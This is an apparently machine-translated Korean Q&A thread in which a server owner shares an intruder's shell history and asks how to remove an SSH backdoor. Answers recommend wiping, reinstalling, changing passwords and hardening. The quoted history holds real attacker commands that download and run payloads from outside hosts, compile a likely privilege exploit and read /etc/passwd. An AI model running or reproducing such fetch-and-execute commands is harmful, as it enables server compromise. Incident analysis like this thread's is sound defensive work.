VServer에서 SSH 백도어를 찾았습니다. 무엇을해야합니까?


24

어제 VServer에서 명령 기록을 확인했습니다. 의심스러운 줄이 여러 개 발견되었습니다.

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

특히 sniffer.tgz는 저에게 충격을주었습니다. 가상 머신을 설정하고이 tgz 아카이브를 다운로드했습니다. 나는 설정을 시작했고 나에게 다음 줄을 주었다.

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

누구든지 이것을 제거하는 방법을 알고 있습니까?


답변:


66

이것이 당신이 가지고있는 모든 시스템에서해야 할 일 sniffer.tgz입니다 : Nuke Them From Orbit 즉시 , 새로 설치부터 시작하십시오. 즉, 깨끗한 백업이 있다고 가정하고 인터넷에 다시 연결하기 전에 시스템을 강화한다고 가정하면 시스템을 파괴하고, 클린을 재설치하고, 클린 백업 에서 데이터를로드합니다 .

이와 같이 맬웨어 나 해커가 시스템에 침입 할 때마다 시스템 구성 방식을 다시 분석하고 시스템과 동일한 단계를 반복 하지 않아야 합니다. 그러나 이것은 시스템이 아니기 때문에 당신은 제쳐두고 법 의학적 분석을 할 수있는 능력이 있으며, 이것이 유일한 서버 일 수 있으므로 가상 시스템을 파괴 하고 처음부터 다시 시작해야 할 때입니다 (위에서 언급했듯이).

(그리고 이것은 시스템에서 맬웨어가 발생하는 모든 상황에 적용됩니다. 이와 같은 것을 대체 할 여분의 하드웨어가없는 한 일반적으로 대부분의 사용자가 가지고 있지 않은 침해 된 시스템을 격리하고 법적으로 검사 할 수 있습니다. 시스템을 정리하고 다시 시작합니다.)

서버를 분석하지 않으면 실제로 무엇을 잘못했는지 말할 수는 없지만이 백도어는 설치 된 단순한 '프로그램'보다 시스템에서 더 깊을 수 있습니다. 또한 악의적 인 사용자가 이미 시스템에 백도어를 설치해야하므로 SSH, MySQL 루트 또는 다른 유형의 비밀번호에 관계없이 모든 비밀번호가 이제는 위반되어 더 이상 안전하지 않다고 가정 할 수 있습니다. 이 컴퓨터 시스템에 입력되었습니다). 모든 비밀번호 를 변경할 시간입니다 !


깨끗한 환경에서 백업 한 후 고려해야 할 단계 강화에 대한 몇 가지 기본 팁이 있습니다. 이것들은 주제를 훨씬 더 넓게 만들기 때문에 여기서는 자세히 다룰 수는 없지만 시스템을 보호하기 위해 강화 단계를 수행해야합니다.

  1. 방화벽을 켜십시오 , 그리고 에만 열어야 포트에 액세스 할 수 있습니다 . ufw간단하게 존재하므로 사용합시다. sudo ufw enable. ( ufw환경에 맞게 올바르게 구성 하는 것은 다른 이야기이며이 질문의 범위를 넘어선 것입니다.)

  2. 원격 SSH에 대한 액세스를 제한하십시오 . 이것이 항상 가능한 것은 아니지만, 자신이 소유 한 IP 주소를 식별하고 특히 방화벽에서 허용하는 것이 이상적입니다. 동적 주거용 IP 주소를 사용하는 경우이 단계를 건너 뛰십시오.

  3. 서버에 SSH 접근을 봉쇄 하고, 단지 인증 SSH 키를 사용해야합니다 . 이런 방식으로 해커는 서버를 공격 할 수 없으며 암호를 시도하고 추측 할 수 있습니다. 적절한 개인 키를 추측하기가 훨씬 어렵습니다 (모두 무차별 공격을해야하기 때문에). 이것은 무차별 공격으로부터 보호하는 데 도움이됩니다.

  4. 웹 사이트를 운영하는 경우, 사람들이 여가 시간에 물건을 업로드 / 실행할 수 없도록 권한을 잠그십시오 . 이 작업은 사이트마다 다르므로 여기서 더 많은 지침을 제공 할 수 없습니다 (불가능).

  5. 또한 Joomla 또는 Wordpress 등을 사용하여 웹 사이트를 실행하는 경우 환경을 최신 상태로 유지하고 소프트웨어 제공 업체의 보안 취약성으로 패치하십시오 .

  6. 가능 하면으로 인증하는 항목에 대해 2 단계 인증 (2FA) 방법을 설정, 구성 및 사용하십시오 . 다양한 응용 프로그램에 대한 2 단계 인증을위한 많은 솔루션이 있으며이 방법으로 다양한 응용 프로그램을 보호하는 것은이 게시물의 범위를 벗어나므로 솔루션을 선택하기 전에이 시점에서 조사해야합니다.

  7. 설정에서 비밀번호 를 절대적으로 사용해야 하는 경우 적절한 비밀번호 관리자 (클라우드 기반 비밀번호는 반드시 좋은 선택은 아님)를 사용하고 각 개별 항목마다 다른 길이가 긴 (25 자 이상) 임의의 잊을 수없는 비밀번호를 사용하십시오. 비밀번호로 보안이 유지되므로 비밀번호 관리자가 권장합니다. (단, SSH 인증 등의 경우) 비밀번호를 사용하지 말고 가능한 경우 2FA를 사용하는 것이 좋습니다.


의견은 긴 토론을위한 것이 아닙니다. 이 대화는 채팅 으로 이동 되었습니다 .
terdon

이것이 내가 할 일이므로 대답을 받아 들였습니다. 절대 개인적인 관심을 위해 VM에서 Backdoor를 닫으려고하지 않습니다.
itskajo

0

백도어가 하나 있으면 3 개가 더 있습니다. cron, php 또는 mysql 데이터를 조심하십시오. 모든 데이터가 손상 될 수 있습니다. 이 시점에서 암호와 해시가 모두 있다는 것을 기억하십시오. 따라서 다른 컴퓨터가 비슷하게 구성된 경우 해당 컴퓨터도 해킹했을 수 있습니다. 어려운 부분은 시작 방법을 파악하는 것입니다. 플러그인 / 테마 등에서 WordPress에 악성 코드가 있는지 확인하려면 권한을 확인하십시오. 간단한 대답은 없습니다. 많은 일을보고 있습니다.


반드시 하나 이상일 필요는 없지만, 종종 또는 그렇지 않을 수도 있습니다. 그리고 모든 암호가 확실하지 않을 수도 있습니다. 그들이 다른 컴퓨터를 해킹 한 것도 "아마도", 당신은 그들의 의도 나 스니핑 된 것을 알지 못하거나, 나쁜 프로그램이 존재하거나 어떤 방식 으로든 실행되지 않은 경우조차도 모릅니다. "주의해서 데이터 복원"은 매우 세심한 조치가 필요한 작업에 대한 일반적인 조언입니다.
James
당사 사이트를 사용함과 동시에 당사의 쿠키 정책개인정보 보호정책을 읽고 이해하였음을 인정하는 것으로 간주합니다.
Licensed under cc by-sa 3.0 with attribution required.